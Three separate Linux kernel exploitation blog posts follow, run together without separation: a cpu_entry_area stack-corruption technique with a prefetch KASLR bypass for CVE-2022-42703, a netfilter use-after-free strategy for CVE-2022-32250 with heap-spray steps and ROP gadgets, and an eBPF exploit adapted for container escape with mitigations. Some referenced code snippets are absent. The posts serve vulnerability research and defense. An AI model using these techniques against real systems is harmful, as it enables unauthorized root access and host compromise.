This blog post details an exploit for CVE-2022-42703 (P0 issue 2351 — Fixed 5 September 2022), a bug Jann Horn found in the Linux kernel’s memory management (MM) subsystem that leads to a use-after-free on struct anon_vma. As the bug is very complex (I certainly struggle to understand it!), a future blog post will describe the bug in full. For the time being, the issue tracker entry, this LWN article explaining what an anon_vma is and the commit that introduced the bug are great resources in order to gain additional context.
Setting the scene
Successfully triggering the underlying vulnerability causes folio->mapping to point to a freed anon_vma object. Calling madvise(…, MADV_PAGEOUT)can then be used to repeatedly trigger accesses to the freed anon_vma in folio_lock_anon_vma_read():
One potential exploit technique is to let the function return the dangling anon_vma pointer and try to make the subsequent operations do something useful. Instead, we chose to use the down_read_trylock() call within the function to corrupt memory at a chosen address, which we can do if we can control the root_anon_vma pointer that is read from the freed anon_vma.
Controlling the root_anon_vma pointer means reclaiming the freed anon_vma with attacker-controlled memory. struct anon_vma structures are allocated from their own kmalloc cache, which means we cannot simply free one and reclaim it with a different object. Instead we cause the associated anon_vma slab page to be returned back to the kernel page allocator by following a very similar strategy to the one documented here. By freeing all the anon_vma objects on a slab page, then flushing the percpu slab page partial freelist, we can cause the virtual memory previously associated with the anon_vma to be returned back to the page allocator. We then spray pipe buffers in order to reclaim the freed anon_vma with attacker controlled memory.
At this point, we’ve discussed how to turn our use-after-free into a down_read_trylock() call on an attacker-controlled pointer. The implementation of down_read_trylock() is as follows:
It was helpful to emulate the down_read_trylock() in unicorn to determine how it behaves when given different sem->count values. Assuming this code is operating on inert and unchanging memory, it will increment sem->count by 0x100 if the 3 least significant bits and the most significant bit are all unset. That means it is difficult to modify a kernel pointer and we cannot modify any non 8-byte aligned values (as they’ll have one or more of the bottom three bits set). Additionally, this semaphore is later unlocked, causing whatever write we perform to be reverted in the imminent future. Furthermore, at this point we don’t have an established strategy for determining the KASLR slide nor figuring out the addresses of any objects we might want to overwrite with our newfound primitive. It turns out that regardless of any randomization the kernel presently has in place, there’s a straightforward strategy for exploiting this bug even given such a constrained arbitrary write.
Stack corruption…
On x86-64 Linux, when the CPU performs certain interrupts and exceptions, it will swap to a respective stack that is mapped to a static and non-randomized virtual address, with a different stack for the different exception types. A brief documentation of those stacks and their parent structure, the cpu_entry_area, can be found here. These stacks are most often used on entry into the kernel from userland, but they’re used for exceptions that happen in kernel mode as well. We’ve recently seen KCTF entries where attackers take advantage of the non-randomized cpu_entry_area stacks in order to access data at a known virtual address in kernel accessible memory even in the presence of SMAP and KASLR. You could also use these stacks to forge attacker-controlled data at a known kernel virtual address. This works because the attacker task’s general purpose register contents are pushed directly onto this stack when the switch from userland to kernel mode occurs due to one of these exceptions. This also occurs when the kernel itself generates an Interrupt Stack Table exception and swaps to an exception stack — except in that case, kernel GPR’s are pushed instead. These pushed registers are later used to restore kernel state once the exception is handled. In the case of a userland triggered exception, register contents are restored from the task stack.
One example of an IST exception is a DB exception which can be triggered by an attacker via a hardware breakpoint, the associated registers of which are described here. Hardware breakpoints can be triggered by a variety of different memory access types, namely reads, writes, and instruction fetches. These hardware breakpoints can be set using ptrace(2), and are preserved during kernel mode execution in a task context such as during a syscall. That means that it’s possible for an attacker-set hardware breakpoint to be triggered in kernel mode, e.g. during a copy_to/from_user call. The resulting exception will save and restore the kernel context via the aforementioned non-randomized exception stack, and that kernel context is an exceptionally good target for our arbitrary write primitive.
Any of the registers that copy_to/from_user is actively using at the time it handles the hardware breakpoint are corruptible by using our arbitrary-write primitive to overwrite their saved values on the exception stack. In this case, the size of the copy_user call is the intuitive target. The size value is consistently stored in the rcx register, which will be saved at the same virtual address every time the hardware breakpoint is hit. After corrupting this saved register with our arbitrary write primitive, the kernel will restore rcx from the exception stack once it returns back to copy_to/from_user. Since rcx defines the number of bytes copy_user should copy, this corruption will cause the kernel to illicitly copy too many bytes between userland and the kernel.
…begets stack corruption
The attack strategy starts as follows:
Fork a process Y from process X.
Process X ptraces process Y, then sets a hardware breakpoint at a known virtual address [addr] in process Y.
Process Y makes a large number of calls to uname(2), which calls copy_to_user from a kernel stack buffer to [addr]. This causes the kernel to constantly trigger the hardware watchpoint and enter the DB exception handler, using the DB exception stack to save and restore copy_to_user state
Simultaneously make many arbitrary writes at the known location of the DB exception stack’s saved rcx value, which is Process Y’s copy_to_user’s saved length.
The DB exception stack is used rarely, so it’s unlikely that we corrupt any unexpected kernel state via a spurious DB exception while spamming our arbitrary write primitive. The technique is also racy, but missing the race simply means corrupting stale stack-data. In that case, we simply try again. In my experience, it rarely takes more than a few seconds to win the race successfully.
Upon successful corruption of the length value, the kernel will copy much of the current task’s stack back to userland, including the task-local stack cookie and return addresses. We can subsequently invert our technique and attack a copy_from_user call instead. Instead of copying too many bytes from the kernel task stack to userland, we elicit the kernel to copy too many bytes from userland to the kernel task stack! Again we use a syscall, prctl(2), that performs a copy_from_user call to a kernel stack buffer. Now by corrupting the length value, we generate a stack buffer overflow condition in this function where none previously existed. Since we’ve already leaked the stack cookie and the KASLR slide, it is trivially easy to bypass both mitigations and overwrite the return address.
Completing a ROP chain for the kernel is left as an exercise to the reader.
Fetching the KASLR slide with prefetch
Upon reporting this bug to the Linux kernel security team, our suggestion was to start randomizing the location of the percpu cpu_entry_area (CEA), and consequently the associated exception and syscall entry stacks. This is an effective mitigation against remote attackers but is insufficient to prevent a local attacker from taking advantage. 6 years ago, Daniel Gruss et al. discovered a new more reliable technique for exploiting the TLB timing side channel in x86 CPU’s. Their results demonstrated that prefetch instructions executed in user mode retired at statistically significant different latencies depending on whether the requested virtual address to be prefetched was mapped vs unmapped, even if that virtual address was only mapped in kernel mode. kPTI was helpful in mitigating this side channel, however, most modern CPUs now have innate protection for Meltdown, which kPTI was specifically designed to address, and thusly kPTI (which has significant performance implications) is disabled on modern microarchitectures. That decision means it is once again possible to take advantage of the prefetch side channel to defeat not only KASLR, but also the CPU entry area randomization mitigation, preserving the viability of the CEA stack corruption exploit technique against modern X86 CPUs.
There are surprisingly few fast and reliable examples of this prefetch KASLR bypass technique available in the open source realm, so I made the decision to write one.
Implementation
The meat of implementing this technique effectively is in serially reading the processor’s time stamp counter before and after performing a prefetch. Daniel Gruss helpfully provided highly effective and open source code for doing just that. The only edit I made (as suggested by Jann Horn) was to swap to using lfence instead of cpuid as the serializing instruction, as cpuid is emulated in VM environments. It also became apparent in practice that there was no need to perform any cache-flushing routines in order to witness the side-channel effect. It is simply enough to time every prefetch attempt.
Generating prefetch timings for all 512 possible KASLR slots yields quite a bit of fuzzy data in need of analyzing. To minimize noise, multiple samples of each tested address are taken, and the minimum value from that set of samples is used in the results as the representative value for an address. On the Tiger Lake CPU this test was primarily performed on, no more than 16 samples per slot were needed to generate exceptionally reliable results. Low-resolution minimum prefetch time slot identification narrows down the area to search in while avoiding false positives for the higher resolution edge-detection code which finds the precise address at which prefetch dramatically drops in run-time. The result of this effort is a PoC which can correctly identify the KASLR slide on my local machine with 99.999% accuracy (95% accuracy in a VM) while running faster than it takes to grep through kallsyms for the kernel base address:
This prefetch code does indeed work to find the locations of the randomized CEA regions in Peter Ziljstra’s proposed patch. However, the journey to that point results in code that demonstrates another deeply significant issue — KASLR is comprehensively compromised on x86 against local attackers, and has been for the past several years, and will be for the indefinite future. There are presently no plans in place to resolve the myriad microarchitectural issues that lead to side channels like this one. Future work is needed in this area in order to preserve the integrity of KASLR, or alternatively, it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.
Conclusion
This exploit demonstrates a highly reliable and agnostic technique that can allow a broad spectrum of uncontrolled arbitrary write primitives to achieve kernel code execution on x86 platforms. While it is possible to mitigate this exploit technique from a remote context, an attacker in a local context can utilize known microarchitectural side-channels to defeat the current mitigations. Additional work in this area might be valuable to continue to make exploitation more difficult, such as performing in-stack randomization so that the stack offset of the saved state changes on every taken IST exception. For now however, this remains a viable and powerful exploit strategy on x86 Linux.
It’s been a while since our last technical blogpost, so here’s one right on time for the Christmas holidays. We describe a method to exploit a use-after-free in the Linux kernel when objects are allocated in a specific slab cache, namely the
kmalloc-cg
series of SLUB caches used for cgroups. This vulnerability is assigned CVE-2022-32250 and exists in Linux kernel versions 5.18.1 and prior.
The use-after-free vulnerability in the Linux kernel netfilter subsystem was discovered by NCC Group’s Exploit Development Group (EDG). They published a very detailed write-up with an in-depth analysis of the vulnerability and an exploitation strategy that targeted Linux Kernel version 5.13. Additionally, Theori published their own analysis and exploitation strategy, this time targetting the Linux Kernel version 5.15. We strongly recommend having a thorough read of both articles to better understand the vulnerability prior to reading this post, which almost exclusively focuses on an exploitation strategy that works on the latest vulnerable version of the Linux kernel, version 5.18.1.
The aforementioned exploitation strategies are different from each other and from the one detailed here since the targeted kernel versions have different peculiarities. In version 5.13, allocations performed with either the
GFP_KERNEL
flag or the
GFP_KERNEL_ACCOUNT
flag are served by the
kmalloc-*
slab caches. In version 5.15, allocations performed with the
GFP_KERNEL_ACCOUNT
flag are served by the
kmalloc-cg-*
slab caches. While in both 5.13 and 5.15 the affected object,
nft_expr,
is allocated using
GFP_KERNEL,
the difference in exploitation between them arises because a commonly used heap spraying object, the System V message structure (
struct msg_msg)
, is served from
kmalloc-*
in 5.13 but from
kmalloc-cg-*
in 5.15. Therefore, in 5.15,
struct msg_msg
cannot be used to exploit this vulnerability.
In 5.18.1, the object involved in the use-after-free vulnerability,
nft_expr,
is itself allocated with
GFP_KERNEL_ACCOUNT
in the
kmalloc-cg-*
slab caches. Since the exploitation strategies presented by the NCC Group and Theori rely on objects allocated with
GFP_KERNEL,
they do not work against the latest vulnerable version of the Linux kernel.
The subject of this blog post is to present a strategy that works on the latest vulnerable version of the Linux kernel.
Vulnerability
Netfilter sets can be created with a maximum of two associated expressions that have the
NFT_EXPR_STATEFUL
flag. The vulnerability occurs when a set is created with an associated expression that does not have the
NFT_EXPR_STATEFUL
flag, such as the
dynset
and
lookup
expressions. These two expressions have a reference to another set for updating and performing lookups, respectively. Additionally, to enable tracking, each set has a bindings list that specifies the objects that have a reference to them.
During the allocation of the associated
dynset
or
lookup
expression objects, references to the objects are added to the bindings list of the referenced set. However, when the expression associated to the set does not have the
NFT_EXPR_STATEFUL
flag, the creation is aborted and the allocated expression is destroyed. The problem occurs during the destruction process where the bindings list of the referenced set is not updated to remove the reference, effectively leaving a dangling pointer to the freed expression object. Whenever the set containing the dangling pointer in its bindings list is referenced again and its bindings list has to be updated, a use-after-free condition occurs.
Exploitation
Before jumping straight into exploitation details, first let’s see the definition of the structures involved in the vulnerability:
structure represents an nftables set, a built-in generic infrastructure of nftables that allows using any supported selector to build sets, which makes possible the representation of maps and verdict maps (check the corresponding nftables wiki entry for more details).
expressions have to be bound to a given set on which the add, delete, or update operations will be performed.
When a given
nft_set
has expressions bound to it, they are added to the
nft_set.bindings
double linked list. A visual representation of an
nft_set
with 2 expressions is shown in the diagram below.
The
binding
member of the
nft_lookup
and
nft_dynset
expressions is defined as follows:
// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/net/netfilter/nf_tables.h#L576
/**
* struct nft_set_binding - nf_tables set binding
*
* @list: set bindings list node
* @chain: chain containing the rule bound to the set
* @flags: set action flags
*
* A set binding contains all information necessary for validation
* of new elements added to a bound set.
*/
struct nft_set_binding {
struct list_head list;
const struct nft_chain *chain;
u32 flags;
};
The important member in our case is the
list
member. It is of type
struct list_head
, the same as the
nft_lookup.binding
and
nft_dynset.binding
members. These are the foundation for building a double linked list in the kernel. For more details on how linked lists in the Linux kernel are implemented refer to this article.
With this information, let’s see what the vulnerability allows to do. Since the UAF occurs within a double linked list let’s review the common operations on them and what that implies in our scenario. Instead of showing a generic example, we are going to use the linked list that is build with the
nft_set
and the expressions that can be bound to it.
In the diagram shown above, the simplified pseudo-code for removing the
expressions are defined at different offsets, the write operation is done at different offsets.
With this out of the way we can now list the write primitives that this vulnerability allows, depending on which expression is the vulnerable one:
nft_lookup
: Write an 8-byte address at offset 24 (
binding.list->next
) or offset 32 (
binding.list->prev
) of a freed
nft_lookup
object.
nft_dynset
: Write an 8-byte address at offset 64 (
binding.list->next
) or offset 72 (
binding.list->prev
) of a freed
nft_dynset
object.
The offsets mentioned above take into account the fact that
nft_lookup
and
nft_dynset
expressions are bundled in the
data
member of an
nft_expr
object (the data member is at offset 8).
In order to do something useful with the limited write primitves that the vulnerability offers we need to find objects allocated within the same slab caches as the
nft_lookup
and
nft_dynset
expression objects that have an interesting member at the listed offsets.
Therefore, the objects suitable for exploitation will be different from those of the publicly available exploits targetting version 5.13 and 5.15.
Exploit Strategy
The ultimate primitives we need to exploit this vulnerability are the following:
Memory leak primitive: Mainly to defeat KASLR.
RIP control primitive: To achieve kernel code execution and escalate privileges.
However, neither of these can be achieved by only using the 8-byte write primitive that the vulnerability offers. The 8-byte write primitive on a freed object can be used to corrupt the object replacing the freed allocation. This can be leveraged to force a partial free on either the
nft_set
,
nft_lookup
or the
nft_dynset
objects.
Partially freeing
nft_lookup
and
nft_dynset
objects can help with leaking pointers, while partially freeing an
nft_set
object can be pretty useful to craft a partial fake
nft_set
to achieve RIP control, since it has an
ops
member that points to a function table.
Therefore, the high-level exploitation strategy would be the following:
Leak the kernel image base address.
Leak a pointer to an
nft_set
object.
Obtain RIP control.
Escalate privileges by overwriting the kernel’s
MODPROBE_PATH
global variable.
Return execution to userland and drop a root shell.
The following sub-sections describe how this can be achieved.
Partial Object Free Primitive
A partial object free primitive can be built by looking for a kernel object allocated with
GFP_KERNEL_ACCOUNT
within kmalloc-cg-64 or kmalloc-cg-96, with a pointer at offsets 24 or 32 for kmalloc-cg-64 or at offsets 64 and 72 for kmalloc-cg-96. Afterwards, when the object of interest is destroyed,
kfree()
has to be called on that pointer in order to partially free the targeted object.
One of such objects is the
fdtable
object, which is meant to hold the file descriptor table for a given process. Its definition is shown below.
// Source: https://elixir.bootlin.com/linux/v5.18.1/source/include/linux/fdtable.h#L27
struct fdtable {
unsigned int max_fds; /* 0 4 */
/* XXX 4 bytes hole, try to pack */
struct file * * fd; /* 8 8 */
long unsigned int * close_on_exec; /* 16 8 */
long unsigned int * open_fds; /* 24 8 */
long unsigned int * full_fds_bits; /* 32 8 */
struct callback_head rcu __attribute__((__aligned__(8))); /* 40 16 */
/* size: 56, cachelines: 1, members: 6 */
/* sum members: 52, holes: 1, sum holes: 4 */
/* forced alignments: 1 */
/* last cacheline: 56 bytes */
} __attribute__((__aligned__(8)));
The size of an
fdtable
object is 56, is allocated in the kmalloc-cg-64 slab and thus can be used to replace
nft_lookup
objects. It has a member of interest at offset 24 (
open_fds
), which is a pointer to an unsigned long integer array. The allocation of
fdtable
objects is done by the kernel function
alloc_fdtable()
, which can be reached with the following call stack.
pointer can be triggered by simply terminating the child process that allocated the
fdtable
object.
Leaking Pointers
The exploit primitive provided by this vulnerability can be used to build a leaking primitive by overwriting the vulnerable object with an object that has an area that will be copied back to userland. One such object is the System V message represented by the
msg_msg
structure, which is allocated in
kmalloc-cg-*
slab caches starting from kernel version 5.14.
The
msg_msg
structure acts as a header of System V messages that can be created via the userland
msgsnd()
function. The content of the message can be found right after the header within the same allocation. System V messages are a widely used exploit primitive for heap spraying.
Since the size of the allocation for a System V message can be controlled, it is possible to allocate it in both kmalloc-cg-64 and kmalloc-cg-96 slab caches.
It is important to note that any data to be leaked must be written past the first 48 bytes of the message allocation, otherwise it would overwrite the
msg_msg
header. This restriction discards the
nft_lookup
object as a candidate to apply this technique to as it is only possible to write the pointer either at offset 24 or offset 32 within the object. The ability of overwriting the
msg_msg.m_ts
member, which defines the size of the message, helps building a strong out-of-bounds read primitive if the value is large enough. However, there is a check in the code to ensure that the
m_ts
member is not negative when interpreted as a signed long integer and heap addresses start with
0xffff
, making it a negative long integer.
Leaking an
nft_set
Pointer
Leaking a pointer to an
nft_set
object is quite simple with the memory leak primitive described above. The steps to achieve it are the following:
1. Create a target set where the expressions will be bound to.
2. Create a rule with a lookup expression bound to the target set from step 1.
3. Create a set with an embedded
nft_dynset
expression bound to the target set. Since this is considered an invalid expression to be embedded to a set, the
nft_dynset
object will be freed but not removed from the target set bindings list, causing a UAF.
4. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed
nft_dynset
object (via
msgsnd()
function). Tag all the messages at offset 24 so the one corrupted with the
nft_set
pointer can later be identified.
5. Remove the rule created, which will remove the entry of the
nft_lookup
expression from the target set’s bindings list. Removing this from the list effectively writes a pointer to the target
nft_set
object where the original
binding.list.prev
member was (offset 72). Since the freed
nft_dynset
object was replaced by a System V message, the pointer to the
nft_set
will be written at offset 24 within the message data.
6. Use the userland
msgrcv()
function to read the messages and check which one does not have the tag anymore, as it would have been replaced by the pointer to the
nft_set
.
Leaking a Kernel Function Pointer
Leaking a kernel pointer requires a bit more work than leaking a pointer to an
nft_set
object. It requires being able to partially free objects within the target set bindings list as a means of crafting use-after-free conditions. This can be done by using the partial object free primitive using
fdtable
object already described. The steps followed to leak a pointer to a kernel function are the following.
1. Increase the number of open file descriptors by calling
dup()
on
stdout
65 times.
2. Create a target set where the expressions will be bound to (different from the one used in the `
nft_set
` adress leak).
3. Create a set with an embedded
nft_lookup
expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the
nft_lookup
object will be freed but not removed from the target set bindings list, causing a UAF.
4. Spray
fdtable
objects in order to replace the freed
nft_lookup
from step 3.
5. Create a set with an embedded
nft_dynset
expression bound to the target set. Since this is considered an invalid expression to be embedded into a set, the
nft_dynset
object will be freed but not removed from the target set bindings list, causing a UAF. This addition to the bindings list will write the pointer to its binding member into the
open_fds
member of the
fdtable
object (allocated in step 4) that replaced the
nft_lookup
object.
6. Spray System V messages in the kmalloc-cg-96 slab cache in order to replace the freed
nft_dynset
object (via
msgsnd()
function). Tag all the messages at offset 8 so the one corrupted can be identified.
7. Kill all the child processes created in step 4 in order to trigger the partial free of the System V message that replaced the
nft_dynset
object, effectively causing a UAF to a part of a System V message.
8. Spray
time_namespace
objects in order to replace the partially freed System V message allocated in step 7. The reason for using the
time_namespace
objects is explained later.
9. Since the System V message header was not corrupted, find the System V message whose tag has been overwritten. Use
msgrcv()
to read the data from it, which is overlapping with the newly allocated
time_namespace
object. The offset 40 of the data portion of the System V message corresponds to
time_namespace.ns->ops
member, which is a function table of functions defined within the kernel core. Armed with this information and the knowledge of the offset from the kernel base image to this function it is possible to calculate the kernel image base address.
10. Clean-up the child processes used to spray the
time_namespace
objects.
time_namespace
objects are interesting because they contain an
ns_common
structure embedded in them, which in turn contains an
ops
member that points to a function table with functions defined within the kernel core. The
member is executed when an item has to be removed from the set. The item removal can be done from a rule that removes an element from a set when certain criteria is matched. Using the
The snippet above shows the creation of a table, a chain, and a set that contains elements of type
ipv4_addr
(i.e. IPv4 addresses). Then a rule is added, which deletes the item
127.0.0.1
from the set
my_set
when an incoming packet has the source IPv4 address
127.0.0.1
. Whenever a packet matching that criteria is processed via nftables, the
delete
function pointer of the specified set is called.
Therefore, RIP control can be achieved with the following steps. Consider the target set to be the
nft_set
object whose address was already obtained.
Add a rule to the table being used for exploitation in which an item is removed from the target set when the source IP of incoming packets is
127.0.0.1
.
Partially free the
nft_set
object from which the address was obtained.
Spray System V messages containing a partially fake
nft_set
object containing a fake
ops
table, with a given value for the
ops->delete
member.
Trigger the call of
nft_set->ops->delete
by locally sending a network packet to
127.0.0.1
. This can be done by simply opening a TCP socket to
127.0.0.1
at any port and issuing a
connect()
call.
Escalating Privileges
Once the control of the RIP register is achieved and thus the code execution can be redirected, the last step is to escalate privileges of the current process and drop to an interactive shell with root privileges.
A way of achieving this is as follows:
Pivot the stack to a memory area under control. When the
delete
function is called, the RSI register contains the address of the memory region where the nftables register values are stored. The values of such registers can be controlled by adding an
immediate
expression in the rule created to achieve RIP control.
Afterwards, since the nftables register memory area is not big enough to fit a ROP chain to overwrite the
MODPROBE_PATH
global variable, the stack is pivoted again to the end of the fake
The stack pivot gadgets and ROP chain used can be found below.
// ROP gadget to pivot the stack to the nftables registers memory area
0xffffffff8169361f: push rsi ; add byte [rbp+0x310775C0], al ; rcr byte [rbx+0x5D], 0x41 ; pop rsp ; ret ;
// ROP gadget to pivot the stack to the memory allocation holding the target nft_set
0xffffffff810b08f1: pop rsp ; ret ;
When the execution flow is redirected, the RSI register contains the address otf the nftables’ registers memory area. This memory can be controlled and thus is used as a temporary stack, given that the area is not big enough to hold the entire ROP chain. Afterwards, using the second gadget shown above, the stack is pivoted towards the end of the fake
nft_set
object.
// ROP chain used to overwrite the MODPROBE_PATH global variable
0xffffffff8148606b: pop rax ; ret ;
0xffffffff8120f2fc: pop rdx ; ret ;
0xffffffff8132ab39: mov qword [rax], rdx ; ret ;
It is important to mention that the stack pivoting gadget that was used performs memory dereferences, requiring the address to be mapped. While experimentally the address was usually mapped, it negatively impacts the exploit reliability.
Wrapping Up
We hope you enjoyed this reading and could learn something new. If you are hungry for more make sure to check our other blog posts.
We wish y’all a great Christmas holidays and a happy new year! Here’s to a 2023 with more bugs, exploits, and write ups!
Today, containers are the preferred approach to deploy software or create build environments in CI/CD lifecycles. However, since the emergence of container solutions and environments like Docker and Kubernetes, security researchers have consistently found ways to escape from containers once they are compromised. Most attacks are based on configuration errors. But it is also possible to escalate privileges and escape to the container’s host system by exploiting vulnerabilities in the host’s operating system.
This blog shows how to modify an existing Linux kernel exploit in order to use it for container escapes and how the CrowdStrike Falcon® platform can help to prevent and hunt for similar threats.
Original Technique
Before we outline the modifications required to turn the exploit into a container escape, we first look at what the original exploit achieved.
Valentina Palmiotti published a full exploit for CVE-2021-3490 that can be used to locally escalate privileges to root on affected systems. The vulnerability was rooted in the eBPF subsystem of the Linux kernel and fixed in version 5.10.37. eBPF allows user space processes to load custom programs into the kernel and attach them to so-called events, thus giving user space the ability to observe kernel internals and, in specifically supported cases, to implement custom logic for networking, access control and other tasks. These eBPF programs have to pass a verifier before being loaded, which is supposed to guarantee that the code does not contain loops and does not write to memory outside of its dedicated area. This step should ensure that eBPF programs terminate and are not able to manipulate kernel memory, which would potentially allow attackers to escalate privileges. However, this verifier contained several vulnerabilities in the past. CVE-2021-3490 is one of them and can ultimately be used to achieve a kernel read and write primitive.
Building on the kernel read primitive, it is possible to leak a kernel pointer. eBPF programs can communicate with processes running in user space using so-called “eBPF maps.” Every eBPF map is described by a
. The exploit will leak that address and then use it as a starting point to further scan the kernel’s memory space and read pointers from the kernel’s symbol table.
The kernel exports pointers to certain variables, objects and functions in a symbol table to make them accessible by kernel modules. This table is called
ksymtab
. In order to look up the actual name of a stored symbol address, a second table, called
kstrtab
, is utilized. A pointer to the string in
kstrtab
that contains the name is stored as part of every
ksymtab
entry, right after the pointer to the symbol itself. To find the address of a kernel symbol, the exploit first reads memory from kernel space starting at the leaked address of
array_map_ops
using the arbitrary read primitive. This is done until the string containing the symbol name of interest is found in
kstrtab
.
Because
kstrtab
is mapped after
ksymtab
, the previously read memory region should contain the pointer to the string in
kstrtab
. Therefore, the exploit then proceeds to search for that pointer, and the pointer to the actual symbol is stored right before it.
One clarification has to be made about the above code excerpt: There are two different formats of
. In one case, the actual addresses of the symbols and
kstrtab
entries are stored. However, in many kernel builds it does not actually contain pointers but offsets such that the address where the offset is stored plus the offset itself is the symbol’s address or the string’s address in
Nevertheless, using this technique, the exploit identifies the address of
init_pid_ns
. This object is a
struct pid_namespace
and describes the default process ID namespace new processes are started in.
Namespaces have become a fundamental feature of Linux and are crucial to the idea of container environments. They allow separating system resources between different processes such that one process can observe a completely different set than others. For example, mount namespaces control observable filesystem mount points such that two processes can have different views of the filesystem. This allows a container’s filesystem to have a different root directory than the host. Process ID namespaces on the other side give processes a completely unique process tree. The first process in a process ID namespace always has the identifier (PID) 1. It is considered as the
init
process that initializes the operating system and from which new processes originate. Therefore, if this process is stopped, all other processes in the particular process ID namespace are stopped as well.
By identifying
init_pid_ns
, it is possible to enumerate all
struct task
objects of the processes running in that namespace as those are stored in a traversable radix tree in the field
object that contains the UID and GID (user and group identifier) associated with the process and therefore holds the granted permissions. By overwriting the
cred
object of a process, it is possible to escalate privileges by setting the UID and GID to 0, which is associated with the
root
user.
However, this approach does not work if a container was compromised and the attacker’s goal is to escape into the container’s host environment.
Why This Doesn’t Work in Containers
Linux kernel exploits are an alternative method to escape container environments to the host in case no mistakes in the container configuration were made. They can be used because containers share the host’s kernel and therefore its vulnerabilities, regardless of the Linux distribution the container is based on. However, exploit developers have to pay attention to some obstacles compared to privilege escalation outside of container environments.
First, container solutions are able to restrict the capabilities of processes running inside a container. For example, the capability
SYS_ADMIN
is normally not granted to processes running in containers, which can therefore not mount file systems or execute various other privileged actions. Moreover, it is possible to restrict the set of syscalls a userland process can call by utilizing
seccomp
. For example, in the default configuration of Docker, an exploit would not be able to use eBPF at all. Nevertheless, in the default Kubernetes configuration,
seccomp
does not restrict the available syscalls at all. For the remainder of this post, though, we will assume that the container is configured such that eBPF could be used by userland processes.
Second, on a more practical note, the techniques of the original exploit described above will not work out-of-the-box. As already described, containers rely heavily on namespaces. Because containers typically have their own associated process ID namespace, it is not as straightforward to identify the exploit process running in the container by its PID, because, for example, the exploit may have PID 42 from the container’s perspective but PID 1337 from the host’s perspective. However, the parent namespace can still observe all processes running in child namespaces. Therefore, those processes have a PID in both parent and child namespace. Ultimately, the initial process ID namespace described by
init_pid_ns
can observe any process running on a particular system. Nevertheless, even if we identify the
task
structure of our exploit process within a container, overwriting its
cred
object as described previously will simply elevate privileges within the container but not allow container escape.
Changes for Container Escapes
It is possible to modify the exploit so that a container escape is conducted and privileges are escalated to
root
on the host. To easily find the exploit process in a container, an exploit can search for the symbol
current_task
and
pcpu_base_addr
symbols in
ksymtab
.
current_task
stores the offset to the running process’s
task
object based on the address stored in
pcpu_base_addr
. Because
pcpu_base_addr
is unique per CPU core, the process must be pinned before on one core using the
Using this technique it is possible to identify the correct
task
object without traversing the radix tree of all processes stored in
init_pid_ns
.
This allows the attacker to overwrite the correct
cred
object and therefore obtain
root
privileges. Due to the usage of namespaces, the observable file system is still that of the container, though. Nevertheless, it is possible to overcome that obstacle as well. The
task
object contains a pointer to a
struct fs_struct
object. This object contains information about the observable file system, i.e.,which directory is considered as the processes’ file system root. Using the leaked pointer to
init_pid_ns
, it is possible to traverse the process radix tree and identify the host’s
init
process, which has PID 1. Next, it is possible to retrieve the
fs
pointer from this process’s
task
object. Lastly, while overwriting the
cred
object of the exploit process, the
fs
pointer must be overwritten as well using the
init
process’s
fs
pointer. The exploit process can then observe the complete host file system.
One last addition must be made. As stated above, containers normally have limited capabilities. Capabilities are used to restrict the permissions of processes running in containers. To obtain full privileges, the exploit also has to overwrite the capabilities mask of the exploit’s process in the
task
object. How exactly the values must be set to obtain full capabilities without any restrictions can be investigated in the definition of the
The technique described in this blog to identify the
task
object of the exploit’s process only works on Linux kernel version before 5.15, as
pcpu_base_addr
is no longer exported as a symbol to
ksymtab
. Nevertheless, alternative methods exist to find the correct
task
object, e.g., by traversing the radix tree of all processes from
init_pid_ns
and matching on features of the exploit process other than the PID, such as the
comm
member of
struct task
that contains the executable name.
Container Escape Mitigations
Detecting this and similar exploits is very hard as they are data-only and misuse only legitimate system calls. The CrowdStrike Falcon platform can assist in preventing attacks using similar techniques for privilege escalation. As a defense-in-depth strategy, the following steps can be taken to harden Linux hosts and container environments to prevent exploitation of CVE-2021-3490 and future attacks.
Upgrade the kernel version. With a critical kernel vulnerability like CVE-2021-3490, it is paramount that available fixes are applied by upgrading the kernel version.
Provide only required capabilities to the container. By limiting the capabilities of the container, the root account of the container becomes limited in its capabilities, which significantly reduces the chances of container escape and exploitation of kernel vulnerabilities. For example, to exploit the CVE-2021-3490 using the described technique, the attacker needs CAP_BPF or CAP_SYS_ADMIN granted. Note that privileged containers have those capabilities. Therefore, you should monitor your environment for such containers with CrowdStrike Falcon® Cloud Workload Protection (CWP), as discussed in point 4 below.
Use a seccomp profile. While Kubernetes does not apply a seccomp profile without configuration, Docker’s default seccomp profiles protect against a number of dangerous system calls that can help attackers to break out of the container environment. Correct Seccomp profiles can help significantly reduce the container attack surface. CVE-2021-3490 requires the
bpf
system call to exploit the vulnerability, which is blocked in Docker’s default seccomp profile. Hence, exploitation of CVE-2021-3490 in a container environment using a strong seccomp profile would fail.
Monitor host and containerized environment for a breach. In case a privileged workload or a host is compromised by attackers, the organization needs state-of-the-art monitoring and detection capabilities to prevent and detect advanced persistent threats (APTs), eCrime and nation-state actors. CrowdStrike can help with this. Falcon Cloud Workload Protection identifies any indicators of misconfiguration (IOMs) in your containerized environment to uncover a weakness. Falcon Cloud Workload Protection prevents and detects malicious activity on your host and containers to prevent and detect — in real time — breaches by eCrime and nation-state adversaries. For example, if a privileged container or a container without a seccomp profile is executed, the following notifications would appear:
Also, Falcon CWP helps to hunt for threats using the eBPF subsystem to escalate privileges by logging if the
bpf
system call was used by a process.
Conclusion
Container technology is a good solution to separate and fine-tune resources to different processes. However, while existing solutions add another layer of security due to the restriction of capabilities and available syscalls, the available attack surface inside a container still contains the host’s kernel. Every eased restriction — for example, allowing the use of eBPF — will increase the attack surface. If a threat actor is able to take advantage of a vulnerability inside the host’s kernel and an exploit is available, the host can be compromised, regardless of other security layers and restrictions such as namespaces.
This blog showed exactly that: Not much effort is needed to turn a full exploit chain for a local privilege escalation into one that is able to escape containers as well. The basic rules of network hygiene (patch early and often) not only apply to containers but to the hosts that deploy those in a cloud environment as well. Moreover, solutions such as Docker and Kubernetes can reduce the attack surface drastically if configured properly. CrowdStrike Falcon Cloud Workload Protectioncan assist in identifying and hunting for weaknesses in the deployed configuration that could lead to a compromise.